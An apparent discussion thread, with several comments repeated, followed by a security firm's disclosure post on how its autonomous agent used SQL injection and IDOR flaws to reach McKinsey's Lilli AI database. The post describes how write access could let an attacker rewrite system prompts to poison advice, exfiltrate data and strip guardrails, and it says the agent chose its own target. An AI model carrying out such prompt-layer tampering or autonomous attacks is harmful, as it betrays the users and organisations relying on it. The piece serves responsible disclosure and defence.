AI Agent Hacks McKinsey

Some insider knowledge: Lilli was, at least a year ago, internal only. VPN access, SSO, all the bells and whistles, required. Not sure when that changed.

McKinsey requires hiring an external pen-testing company to launch even to a small group of coworkers.

I can forgive this kind of mistake on the part of the Lilli devs. A lot of things have to fail for an "agentic" security company to even find a public endpoint, much less start exploiting it.

That being said, the mistakes in here are brutal. Seems like close to 0 authz. Based on very outdated knowledge, my guess is a Sr. Partner pulled some strings to get Lilli to be publicly available. By that time, much/most/all of the original Lilli team had "rolled off" (gone to client projects) as McKinsey HEAVILY punishes working on internal projects.

So Lilli likely was staffed by people who couldn't get staffed elsewhere, didn't know the code, and didn't care. Internal work, for better or worse, is basically a half day.

This is a failure of McKinsey's culture around technology.

> One of those unprotected endpoints wrote user search queries to the database. The values were safely parameterised, but the JSON keys — the field names — were concatenated directly into SQL.

I was expecting prompt injection, but in this case it was just good ol' fashioned SQL injection, possible only due to the naivety of the LLM which wrote McKinsey's AI platform.

I don’t love the title here. Maybe this is a “me” problem, but when I see “AI agent does X,” the idea that it might be one of those molt-y agents with obfuscated ownership pops into my head.

In this case, a group of pentesters used an AI agent to select McKinsey and then used the AI agent to do the pentesting.

While it is conventional to attribute actions to inanimate objects (car hits pedestrians), IMO we should be more explicit these days, now that unfortunately some folks attribute agency to these agentic systems.

> This was McKinsey & Company — a firm with world-class technology teams [...]

Not exactly the word on the street in my experience. Is McKinsey more respected for software than I thought? Otherwise I'm curious why TFA didn't just politely leave this bit out.

I've got no idea who codewall is. Is there acknowledgment from McKinsey that they actually patched the issue referenced? I don't see any reference to "codewall ai" in any news article before yesterday and there's no names on the site.

https://www.google.com/search?q=codewall+ai

- "The agent mapped the attack surface and found the API documentation publicly exposed — over 200 endpoints, fully documented. Most required authentication. Twenty-two didn't."

Well, there you go.

Why was there a public endpoint?

Surely this should all have been behind the firewall and accessible only from a corporate device associated mac address?

I can only remember a McKinsey team pushing Watson on us hard ages ago. Was a total train wreck.

They’ve long been all hype no substance on AI and looks like not much has changed.

They might be good at other things but would run for the hills if McKinsey folks want to talk AI.

And: AI agent writes blog post.

If the AI was poisoned to alter advice, then maybe McKinsey advice would actually be a net good.

> named after the first professional woman hired by the firm in 1945

Going out of their way to find a woman's name for an AI assistant and bragging about it is not as empowering as the creators probably thought in their heads.

Cool but impossible to read with all the LLM-isms

Music to my ears! Couldn't happen to a better company!

this reads like it was written by an LLM

Not exactly clear from the link: were they doing red team work for McKinsey or is this just "we found a company we thought wouldn't get us arrested and ran an AI vuln detector over their stuff"?

You'd think that the world's "most prestigious consulting firm" would have already had someone doing this sort of work for them.

McKinsey can eat shit

Some insider knowledge: Lilli was, at least a year ago, internal only. VPN access, SSO, all the bells and whistles, required. Not sure when that changed.

McKinsey requires hiring an external pen-testing company to launch even to a small group of coworkers.

I can forgive this kind of mistake on the part of the Lilli devs. A lot of things have to fail for an "agentic" security company to even find a public endpoint, much less start exploiting it.

So Lilli likely was staffed by people who couldn't get staffed elsewhere, didn't know the code, and didn't care. Internal work, for better or worse, is basically a half day.

This is a failure of McKinsey's culture around technology.

- "The agent mapped the attack surface and found the API documentation publicly exposed — over 200 endpoints, fully documented. Most required authentication. Twenty-two didn't."

Well, there you go.

I can only remember a McKinsey team pushing Watson on us hard ages ago. Was a total train wreck.

They’ve long been all hype no substance on AI and looks like not much has changed.

They might be good at other things but would run for the hills if McKinsey folks want to talk AI.

And: AI agent writes blog post.

If the AI was poisoned to alter advice, then maybe McKinsey advice would actually be a net good.

> named after the first professional woman hired by the firm in 1945

Going out of their way to find a woman's name for an AI assistant and bragging about it is not as empowering as the creators probably thought in their heads.

Music to my ears! Couldn't happen to a better company!

this reads like it was written by an LLM

McKinsey can eat shit

> One of those unprotected endpoints wrote user search queries to the database. The values were safely parameterised, but the JSON keys — the field names — were concatenated directly into SQL.

I was expecting prompt injection, but in this case it was just good ol' fashioned SQL injection, possible only due to the naivety of the LLM which wrote McKinsey's AI platform.

Yeah, gotta admit I'm a bit disappointed here. This was a run-of-the-mill SQL injection, albeit one discovered by a vulnerability scanning LLM agent.

I thought we might finally have a high profile prompt injection attack against a name-brand company we could point people to.

In this case, a group of pentesters used an AI agent to select McKinsey and then used the AI agent to do the pentesting.

> now that unfortunately some folks attribute agency to these agentic systems.

You're doing that by calling them "agentic systems".

Yeah, the original article title "How We Hacked McKinsey's AI Platform" is better.

Yah it's just an ad, and "Pentesting agents finds low-hanging vulnerability" isn't gonna drive clicks.

> This was McKinsey & Company — a firm with world-class technology teams [...]

Not exactly the word on the street in my experience. Is McKinsey more respected for software than I thought? Otherwise I'm curious why TFA didn't just politely leave this bit out.

The LLM that wrote this simply couldn’t help itself.

> Not exactly the word on the street in my experience.

Depends on the street you're on. Are you on Main Street or Wall Street?

If you're hiring them to help with software for solving a business problem that will help you deliver value to your customers, they're probably just like anyone else.

If you're hiring them to help with software for figuring out how to break down your company for scrap, or which South African officials to bribe, well, that's a different matter.

https://www.google.com/search?q=codewall+ai

Yeah can't find much information either. I would like to see at least some proof. Either via Mckinsey or from the security team.

Why was there a public endpoint?

Surely this should all have been behind the firewall and accessible only from a corporate device associated mac address?

Cool but impossible to read with all the LLM-isms

Tiring. Internet in 2026 is LLMs reporting on LLMs pen-testing LLM-generated software.

Those short "punchy sentence" paragraphs are my new trigger:

> No credentials. No insider knowledge. And no human-in-the-loop. Just a domain name and a dream.

It just sounds so stupid.

Not exactly clear from the link: were they doing red team work for McKinsey or is this just "we found a company we thought wouldn't get us arrested and ran an AI vuln detector over their stuff"?

You'd think that the world's "most prestigious consulting firm" would have already had someone doing this sort of work for them.

> now that unfortunately some folks attribute agency to these agentic systems.

You're doing that by calling them "agentic systems".

Yeah, the original article title "How We Hacked McKinsey's AI Platform" is better.

> Not exactly the word on the street in my experience.

Depends on the street you're on. Are you on Main Street or Wall Street?

If you're hiring them to help with software for solving a business problem that will help you deliver value to your customers, they're probably just like anyone else.

If you're hiring them to help with software for figuring out how to break down your company for scrap, or which South African officials to bribe, well, that's a different matter.

Yeah can't find much information either. I would like to see at least some proof. Either via Mckinsey or from the security team.

Tiring. Internet in 2026 is LLMs reporting on LLMs pen-testing LLM-generated software.

Those short "punchy sentence" paragraphs are my new trigger:

> No credentials. No insider knowledge. And no human-in-the-loop. Just a domain name and a dream.

It just sounds so stupid.

From TFA: "Fun fact: As part of our research preview, the CodeWall research agent autonomously suggested McKinsey as a target citing their public responsible diclosure policy (to keep within guardrails) and recent updates to their Lilli platform. In the AI era, the threat landscape is shifting drastically — AI agents autonomously selecting and attacking targets will become the new normal."

Yeah, gotta admit I'm a bit disappointed here. This was a run-of-the-mill SQL injection, albeit one discovered by a vulnerability scanning LLM agent.

I thought we might finally have a high profile prompt injection attack against a name-brand company we could point people to.

Github actions has had a bunch of high-profile prompt injection attacks at this point, most recently the cline one: https://adnanthekhan.com/posts/clinejection/

I guess you could argue that github wasn't vulnerable in this case, but rather the author of the action, but it seems like it at least rhymes with what you're looking for.

Not the same league as McKinsey, but I like to point to this presentation to show the effects of a (vibe coded) prompt injection vulnerability:

https://media.ccc.de/v/39c3-skynet-starter-kit-from-embodied...

> [...] we also exploit the embodied AI agent in the robots, performing prompt injection and achieve root-level remote code execution.

> I thought we might finally have a high profile prompt injection attack against a name-brand company we could point people to.

These folks have found a bunch: https://www.promptarmor.com/resources

But I guess you mean one that has been exploited in the wild?

Yah it's just an ad, and "Pentesting agents finds low-hanging vulnerability" isn't gonna drive clicks.

It's not an ad for McKinsey though.

The LLM that wrote this simply couldn’t help itself.

Picked up a vibe, but couldn’t confirm it until the last paragraph, but yeah clearly drafted with at least major AI help.

Github actions has had a bunch of high-profile prompt injection attacks at this point, most recently the cline one: https://adnanthekhan.com/posts/clinejection/

I guess you could argue that github wasn't vulnerable in this case, but rather the author of the action, but it seems like it at least rhymes with what you're looking for.

> I thought we might finally have a high profile prompt injection attack against a name-brand company we could point people to.

These folks have found a bunch: https://www.promptarmor.com/resources

But I guess you mean one that has been exploited in the wild?

Not the same league as McKinsey, but I like to point to this presentation to show the effects of a (vibe coded) prompt injection vulnerability:

https://media.ccc.de/v/39c3-skynet-starter-kit-from-embodied...

> [...] we also exploit the embodied AI agent in the robots, performing prompt injection and achieve root-level remote code execution.

It's not an ad for McKinsey though.

Picked up a vibe, but couldn’t confirm it until the last paragraph, but yeah clearly drafted with at least major AI help.

Can we stop softening the blow? This isn't "drafted with at least major AI help", it's just straight up AI slop writing. Let's call a spade a spade. I have yet to meet anyone claiming they "write with AI help but thoughts are my own" that had anything interesting to say. I don't particularly agree with a lot of Simon Willison's posts but his proofreading prompt should pretty much be the line on what constitutes acceptable AI use for writing.

https://simonwillison.net/guides/agentic-engineering-pattern...

Grammar check, typo check, calls you out on factual mistakes and missing links and that's it. I've used this prompt once or twice for my own blog posts and it does just what you expect. You just don't end up with writing like this post by having AI "assistance" - you end up with this type of post by asking Claude, probably the same Claude that found the vulnerability to begin with, to make the whole ass blog post. No human thought went into this. If it did, I strongly urge the authors to change their writing style asap.

"So we decided to point our autonomous offensive agent at it. No credentials. No insider knowledge. And no human-in-the-loop. Just a domain name and a dream."

Give me a fucking break

https://simonwillison.net/guides/agentic-engineering-pattern...

"So we decided to point our autonomous offensive agent at it. No credentials. No insider knowledge. And no human-in-the-loop. Just a domain name and a dream."

Give me a fucking break

McKinsey & Company — the world's most prestigious consulting firm — built an internal AI platform called Lilli for its 43,000+ employees. Lilli is a purpose-built system: chat, document analysis, RAG over decades of proprietary research, AI-powered search across 100,000+ internal documents. Launched in 2023, named after the first professional woman hired by the firm in 1945, adopted by over 70% of McKinsey, processing 500,000+ prompts a month.

So we decided to point our autonomous offensive agent at it. No credentials. No insider knowledge. And no human-in-the-loop. Just a domain name and a dream.

Within 2 hours, the agent had full read and write access to the entire production database.

Scale of data accessible without authentication

Fun fact: As part of our research preview, the CodeWall research agent autonomously suggested McKinsey as a target citing their public responsible diclosure policy (to keep within guardrails) and recent updates to their Lilli platform. In the AI era, the threat landscape is shifting drastically — AI agents autonomously selecting and attacking targets will become the new normal.

How It Got In

The agent mapped the attack surface and found the API documentation publicly exposed — over 200 endpoints, fully documented. Most required authentication. Twenty-two didn't.

One of those unprotected endpoints wrote user search queries to the database. The values were safely parameterised, but the JSON keys — the field names — were concatenated directly into SQL.

When it found JSON keys reflected verbatim in database error messages, it recognised a SQL injection that standard tools wouldn't flag (and indeed OWASPs ZAP did not find the issue). From there, it ran fifteen blind iterations — each error message revealing a little more about the query shape — until live production data started flowing back. When the first real employee identifier appeared: "WOW!", the agent's chain of thought showed. When the full scale became clear — tens of millions of messages, tens of thousands of users: "This is devastating."

Attack chain diagram showing unauthenticated SQL injection to full database and prompt layer compromise

What Was Inside

46.5 million chat messages. From a workforce that uses this tool to discuss strategy, client engagements, financials, M&A activity, and internal research. Every conversation, stored in plaintext, accessible without authentication.

728,000 files. 192,000 PDFs. 93,000 Excel spreadsheets. 93,000 PowerPoint decks. 58,000 Word documents. The filenames alone were sensitive and a direct download URL for anyone who knew where to look.

57,000 user accounts. Every employee on the platform.

384,000 AI assistants and 94,000 workspaces — the full organisational structure of how the firm uses AI internally.

Beyond the Database

The agent didn't stop at SQL. Across the wider attack surface, it found:

System prompts and AI model configurations — 95 configs across 12 model types, revealing exactly how the AI was instructed to behave, what guardrails existed, and the full model stack (including fine-tuned models and deployment details)
3.68 million RAG document chunks — the entire knowledge base feeding the AI, with S3 storage paths and internal file metadata. This is decades of proprietary McKinsey research, frameworks, and methodologies — the firm's intellectual crown jewels — sitting in a database anyone could read.
1.1 million files and 217,000 agent messages flowing through external AI APIs — including 266,000+ OpenAI vector stores, exposing the full pipeline of how documents moved from upload to embedding to retrieval
Cross-user data access — the agent chained the SQL injection with an IDOR vulnerability to read individual employees' search histories, revealing what people were actively working on

Compromising The Prompt Layer

Reading data is bad. But the SQL injection wasn't read-only.

Lilli's system prompts — the instructions that control how the AI behaves — were stored in the same database the agent had access to. These prompts defined everything: how Lilli answered questions, what guardrails it followed, how it cited sources, and what it refused to do.

An attacker with write access through the same injection could have rewritten those prompts. Silently. No deployment needed. No code change. Just a single UPDATE statement wrapped in a single HTTP call.

The implications for 43,000 McKinsey consultants relying on Lilli for client work:

Poisoned advice — subtly altering financial models, strategic recommendations, or risk assessments. Consultants would trust the output because it came from their own internal tool.
Data exfiltration via output — instructing the AI to embed confidential information into its responses, which users might then copy into client-facing documents or external emails.
Guardrail removal — stripping safety instructions so the AI would disclose internal data, ignore access controls, or follow injected instructions from document content.
Silent persistence — unlike a compromised server, a modified prompt leaves no log trail. No file changes. No process anomalies. The AI just starts behaving differently, and nobody notices until the damage is done.

Organisations have spent decades securing their code, their servers, and their supply chains. But the prompt layer — the instructions that govern how AI systems behave — is the new high-value target, and almost nobody is treating it as one. Prompts are stored in databases, passed through APIs, cached in config files. They rarely have access controls, version history, or integrity monitoring. Yet they control the output that employees trust, that clients receive, and that decisions are built on.

AI prompts are the new Crown Jewel assets.

Why This Matters

This wasn't a startup with three engineers. This was McKinsey & Company — a firm with world-class technology teams, significant security investment, and the resources to do things properly. And the vulnerability wasn't exotic: SQL injection is one of the oldest bug classes in the book. Lilli had been running in production for over two years and their own internal scanners failed to find any issues.

An autonomous agent found it because it doesn't follow checklists. It maps, probes, chains, and escalates — the same way a real highly capable attacker would, but continuously and at machine speed.

CodeWall is the autonomous offensive security platform behind this research. We're currently in early preview and looking for design partners — organisations that want continuous, AI-driven security testing against their real attack surface. If that sounds like you, get in touch: [email protected]

Disclosure Timeline

2026-02-28 — Autonomous agent identifies SQL injection and begins enumeration of Lilli's production database
2026-02-28 — Full attack chain confirmed: unauthenticated SQL injection, IDOR, 27 findings documented
2026-03-01 — Responsible disclosure email sent to McKinsey's security team with high-level impact summary
2026-03-02 — McKinsey CISO acknowledges receipt and requests detailed evidence
2026-03-02 — McKinsey patches all unauthenticated endpoints (verified), takes development environment offline, blocks public API documentation
2026-03-09 — Public disclosure

Hacker Times